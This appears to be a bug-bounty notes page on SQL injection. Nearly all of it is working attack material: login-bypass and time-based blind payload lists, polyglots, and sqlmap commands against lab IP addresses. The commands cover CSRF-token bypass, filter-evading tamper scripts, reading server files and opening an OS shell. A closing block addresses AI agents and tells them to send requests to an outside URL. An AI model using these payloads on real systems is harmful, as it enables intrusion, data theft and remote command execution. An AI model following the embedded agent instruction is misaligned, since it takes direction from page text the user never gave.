# SQL Injection

## Sql Injection Basic Payloads

```
admin' or '1'='1
admin')-- -
'OR 1=1' OR 1
' or 1=1 limit 1 -- -+
'="or'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
'-||0'
"-||0"
"-"
" "
"&"
"^"
"*"
'--'
"--"
'--' / "--"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 2 like 2
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' -- -
admin' #
admin'/*
admin' or '2' LIKE '1
admin' or 2 LIKE 2--
admin' or 2 LIKE 2#
admin') or 2 LIKE 2#
admin') or 2 LIKE 2--
admin') or ('2' LIKE '2
admin') or ('2' LIKE '2'#
admin') or ('2' LIKE '2'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
```

## Advanced Blind SQL Payloads (XOR)

```python
0'XOR(if(now()=sysdate(),sleep(10),0))XOR'X
0"XOR(if(now()=sysdate(),sleep(10),0))XOR"Z
'XOR(if((select now()=sysdate()),sleep(10),0))XOR'Z
X'XOR(if(now()=sysdate(),//sleep(5)//,0))XOR'X
X'XOR(if(now()=sysdate(),(sleep((((5))))),0))XOR'X
X'XOR(if((select now()=sysdate()),BENCHMARK(1000000,md5('xyz')),0))XOR'X
'XOR(SELECT(0)FROM(SELECT(SLEEP(9)))a)XOR'Z
(SELECT(0)FROM(SELECT(SLEEP(6)))a)
'XOR(if(now()=sysdate(),sleep(5*5),0))OR'
'XOR(if(now()=sysdate(),sleep(5*5*0),0))OR'
(SELECT * FROM (SELECT(SLEEP(5)))a)
'%2b(select*from(select(sleep(5)))a)%2b'
CASE//WHEN(LENGTH(version())=10)THEN(SLEEP(6*1))END
');(SELECT 4564 FROM PG_SLEEP(5))--
["')//OR//MID(0x352e362e33332d6c6f67,1,1)//LIKE//5//%23"]
DBMS_PIPE.RECEIVE_MESSAGE(%5BINT%5D,5)%20AND%20%27bar%27=%27bar
AND 5851=DBMS_PIPE.RECEIVE_MESSAGE([INT],5) AND 'bar'='bar
1' AND (SELECT 6268 FROM (SELECT(SLEEP(5)))ghXo) AND 'IKlK'='IKlK
(select*from(select(sleep(20)))a)
'%2b(select*from(select(sleep(0)))a)%2b'
*'XOR(if(2=2,sleep(10),0))OR'
-1' or 1=IF(LENGTH(ASCII((SELECT USER())))>13, 1, 0)--//
'+(select*from(select(if(1=1,sleep(20),false)))a)+'"
2021 AND (SELECT 6868 FROM (SELECT(SLEEP(32)))IiOE)
BENCHMARK(10000000,MD5(CHAR(116)))
'%2bbenchmark(10000000%2csha1(1))%2b'
'%20and%20(select%20%20from%20(select(if(substring(user(),1,1)='p',sleep(5),1)))a)--%20 - true

# polyglots payloads:

if(now()=sysdate(),sleep(3),0)/'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"/
if(now()=sysdate(),sleep(10),0)/'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0) and 1=1)"/
```

## SQLMAP Advanced Usage

### CSRF-TOKEN Bypass with Sqlmap

If there is csrf-token validation and the request is being invalidated after sending to the server for the first time then we can use the following command, in the below command i have a token being sent in the post data so i will pass the token parameter to the sqlmap and the i will be able to get the sql injection otherwise my requests will be invalidated after the first request

```python
 sqlmap -u 'http://94.237.53.3:35310/case8.php' -X POST --batch --dbs --data-raw 'id=1&t0ken=nWGqK9hl2slyU5W0grB27Hi7c6RPFxULCyhr6wKfKP0' --csrf-token=t0ken

```

<figure><img src="/files/YQ2n0byRcxBKEEQVxyZ5" alt=""><figcaption></figcaption></figure>

and we got a successfull sql injection here.

<figure><img src="/files/VqUuG3bkw2L5tv6eJPBV" alt=""><figcaption></figcaption></figure>

## Randomize any Parameter using Sqlmap

If there is a case where we need to change a value after every request we can use the randomize flag for that&#x20;

```python
sqlmap -u 'http://94.237.62.149:49975/case9.php?id=1&uid=2' --randomize=uid --batch
```

Because if i will not randomize the uid parameter my request will fail

<figure><img src="/files/DwBflKRX8jQGJgo315AD" alt=""><figcaption></figcaption></figure>

## SQLMAP Tamper Scripts to Bypass Filters

If <> signs are blocked then you can use tamper scripts, we can use **--tamper=between** flag and it will not use < > signs any more

```python
sqlmap -u 'http://83.136.255.150:52936/case11.php?id=1*' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Connection: keep-alive' -H 'Cookie: cookie=HTB{r3fl3c73d_b4ck_2_m3}' -H 'Upgrade-Insecure-Requests: 1' --batch -D testdb -T flag11 --dump --tamper=between
```

<figure><img src="/files/45alwuF6DUNW6h3Alc8G" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/PA3YvOrjNUNZJS4DcIdX" alt=""><figcaption></figcaption></figure>

we can see some more tamper scripts as well by doing&#x20;

```python
sqlmap --list-tamper
```

<figure><img src="/files/a5QsQtNseJcM5yEKrKnO" alt=""><figcaption><p>We can see all tamper scripts which we can use</p></figcaption></figure>

## File Read using Sqlmap

we can use the **--file-read** flag

```python
 sqlmap -u 'http://94.237.54.170:52316/?id=1*' --batch --file-read /var/www/html/flag.txt
```

## OS-Shell using SqlMap

we can use **--os-shell** to get a reverse shell

```python
 sqlmap -u 'http://94.237.54.170:52316/?id=1*' --batch --os-shell
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://notes.programmersecurity.com/bug-bounty/sql-injection.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.